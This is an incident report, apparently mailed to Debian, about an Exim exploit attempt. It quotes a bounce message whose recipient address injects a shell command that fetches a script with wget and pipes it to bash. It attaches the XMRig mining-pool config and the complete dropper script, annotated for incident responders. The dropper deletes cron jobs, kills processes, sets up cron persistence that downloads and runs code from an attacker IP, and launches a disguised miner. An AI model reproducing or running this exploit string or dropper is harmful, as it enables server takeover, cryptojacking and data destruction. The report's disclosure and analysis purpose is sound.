To whom this may concern,
I got a system message from my mailer daemon lately. It contains
-------------------------------- cut --------------------------------
Message 1kS01n-0008Kv-Nb has been frozen (delivery error message).
The sender is <>.
The following address(es) have yet to be delivered:
${run{\x2Fbin\x2Fsh\t-c\t\x22wget\t-O\t-\thttps\x3A\x2F\x2Fpaste\x2Edebian\x2Enet\x2Fdownloadh\x2Fb8e3188e\t\x7C\tbash\x22}}@ianm-mang.math.kit.edu:
Too many "Received" headers - suspected mail loop
-------------------------------- cut --------------------------------
When you look into this you will find the URL
https://paste.debian.net/downloadh/b8e3188e
which is downloaded via wget (called by /bin/sh) and then piped to
bash. I have attached the file. I have also attached another file which
will be downloaded within the file above
(https://paste.debian.net/downloadh/a6621e02). The file pkgmgr.sh that
should be downloaded as well has not been downloadable for me so far.
I don't know if this message reaches the right people, but someone may
forward it. You may at least remove the files which are accessible on
paste.debian.net.
Best
Christian
{
"api": {
"id": null,
"worker-id": null
},
"http": {
"enabled": false,
"host": "127.0.0.1",
"port": 0,
"access-token": null,
"restricted": true
},
"autosave": true,
"background": true,
"colors": true,
"title": true,
"randomx": {
"init": -1,
"mode": "auto",
"1gb-pages": false,
"rdmsr": true,
"wrmsr": true,
"cache_qos": false,
"numa": true
},
"cpu": {
"enabled": true,
"huge-pages": true,
"hw-aes": null,
"priority": null,
"memory-pool": false,
"yield": true,
"asm": true,
"argon2-impl": null,
"astrobwt-max-size": 550,
"astrobwt-avx2": false,
"argon2": [0, 2, 1, 3],
"astrobwt": [0, 2, 1, 3],
"cn": [
[1, 0],
[1, 1]
],
"cn-heavy": [
[1, 0]
],
"cn-lite": [
[1, 0],
[1, 2],
[1, 1],
[1, 3]
],
"cn-pico": [
[2, 0],
[2, 2],
[2, 1],
[2, 3]
],
"rx": [0, 1],
"rx/wow": [0, 2, 1, 3],
"cn/0": false,
"cn-lite/0": false,
"kawpow": false,
"rx/arq": "rx/wow",
"rx/keva": "rx/wow"
},
"donate-level": 1,
"donate-over-proxy": 1,
"log-file": null,
"pools": [
{
"algo": "rx/0",
"coin": null,
"url": "83.97.20.122:443",
"user": "sshagent",
"pass": "x",
"rig-id": null,
"nicehash": true,
"keepalive": true,
"enabled": true,
"tls": false,
"tls-fingerprint": null,
"daemon": false,
"socks5": null,
"self-select": null
}
],
"print-time": 600,
"retries": 15000,
"retry-pause": 15,
"syslog": false,
"tls": {
"enabled": false,
"protocols": null,
"cert": null,
"cert_key": null,
"ciphers": null,
"ciphersuites": null,
"dhparam": null
},
"user-agent": null,
"verbose": 0,
"watch": true,
"pause-on-battery": false
}#!/bin/bash
# NOTE(review): this is the attacker's dropper exactly as captured in the
# report above (the payload that the ${run{...}} address in the quoted bounce
# fetches from paste.debian.net and pipes into bash). It is kept byte-for-byte
# and annotated for incident responders; it is not code to be run.
#
# Sentinel: the whole script is skipped once the renamed miner binary exists,
# so /etc/pkg/pkgmgr is the primary on-host indicator of a completed install.
if [ ! -f /etc/pkg/pkgmgr ]; then
# Competitor-killer loop: examine the five processes with the highest %CPU
# (ps pcpu column, header stripped by 'NR!=1', sorted descending, i-th row
# selected by head/tail).
for i in {1..5}; do
# i-th highest %CPU value. The grep -v exclusion (apache/nginx/ssh/exim/ftp)
# runs on a stream that contains only the numeric pcpu column, so it cannot
# match here; the same is true for the PID and Time pipelines below, which
# print column 2 (a number) before grep runs. The name exclusion therefore
# only ever affects CmdName, which is never used -- the kill decision below
# is NOT protected from hitting those services.
CPU=$(ps -eo pcpu | awk 'NR!=1' | sort -k1 -r -n | grep -v -e apache -e nginx -e ssh -e exim -e ftp | head -$i | tail -1)
# Keep only the integer part of the %CPU value (strip ".xx").
CPU=$(echo $CPU | sed 's/\.[^[:blank:]]*//')
# Command name of the i-th row (computed but unused).
CmdName=$(ps -eo pcpu,cmd | awk 'NR!=1' | sort -k1 -r -n | awk '{print $2}' | grep -v -e apache -e nginx -e ssh -e exim -e ftp | head -$i | tail -1)
# PID of the i-th row.
PID=$(ps -eo pcpu,pid | awk 'NR!=1' | sort -k1 -r -n | awk '{print $2}' | grep -v -e apache -e nginx -e ssh -e exim -e ftp | head -$i | tail -1)
# Elapsed running time in seconds (ps etimes) of the i-th row.
Time=$(ps -eo pcpu,etimes | awk 'NR!=1' | sort -k1 -r -n | awk '{print $2}' | grep -v -e apache -e nginx -e ssh -e exim -e ftp | head -$i | tail -1)
# Any process above 39% CPU that has been running for more than 86400 s
# (one day) is treated as a rival miner: every system cron entry is deleted,
# /etc/crontab is truncated, and the process is killed with SIGKILL.
# IR impact: legitimate long-running high-CPU services and all /etc/cron.*
# jobs on the host are destroyed; restore cron from backup/config management.
if ((( 39 < $CPU )) && ((86400 < $Time))); then
rm /etc/cron.d/*
rm /etc/cron.hourly/*
rm /etc/cron.daily/*
rm /etc/cron.weekly/*
rm /etc/cron.monthly/*
> /etc/crontab
kill -9 $PID
fi
done
# Persistence: a daily cron script that re-fetches pkgmgr.sh from
# 83.97.20.122 (the same IP that config.json above uses as the mining pool)
# and pipes it to bash. Indicator: /etc/cron.daily/pkgmgr.sh, mode 744.
echo "#!/bin/bash" > /etc/cron.daily/pkgmgr.sh
echo "wget http://83.97.20.122:80/pkgmgr.sh | bash " >> /etc/cron.daily/pkgmgr.sh
chmod 744 /etc/cron.daily/pkgmgr.sh
# Drop directory for the miner; /etc/pkg is chosen to look like a package
# manager's state directory.
mkdir /etc/pkg
cd /etc/pkg
# Miner configuration (the JSON reproduced above: pool 83.97.20.122:443,
# user "sshagent", nicehash mode, donate-level 1).
wget -O config.json https://paste.debian.net/downloadh/a6621e02
# Unmodified xmrig 6.3.3 static x64 release from GitHub, renamed to "pkgmgr"
# to masquerade as a package manager. Network indicators: outbound HTTPS to
# paste.debian.net and github.com, then to 83.97.20.122 on 443 (stratum) and
# 80 (cron re-fetch).
wget https://github.com/xmrig/xmrig/releases/download/v6.3.3/xmrig-6.3.3-linux-static-x64.tar.gz
tar -xzf xmrig-6.3.3-linux-static-x64.tar.gz
mv xmrig-6.3.3/xmrig pkgmgr
# World-writable/executable binary; the archive and extracted tree are
# removed so only /etc/pkg/pkgmgr and /etc/pkg/config.json remain on disk.
chmod 777 pkgmgr
rm -r xmrig-6.3.3
rm xmrig-6.3.3-linux-static-x64.tar.gz
# Launch the miner in the background with all output discarded; look for a
# long-running process named "pkgmgr" with cwd /etc/pkg.
./pkgmgr >/dev/null 2>/dev/null &
fiAttachment: